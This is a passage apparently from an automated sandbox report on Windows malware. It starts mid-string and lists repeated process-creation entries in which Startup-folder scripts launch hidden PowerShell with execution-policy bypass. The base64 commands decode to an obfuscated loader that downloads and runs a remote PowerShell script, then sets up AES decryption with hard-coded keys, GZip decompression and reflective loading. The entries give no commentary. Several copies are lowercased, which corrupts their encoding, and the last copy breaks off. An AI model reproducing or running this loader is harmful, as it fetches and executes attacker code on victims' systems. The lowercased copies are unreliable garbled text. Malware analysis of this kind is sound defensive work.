YW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_406c4ae3.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b50e3cba.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjy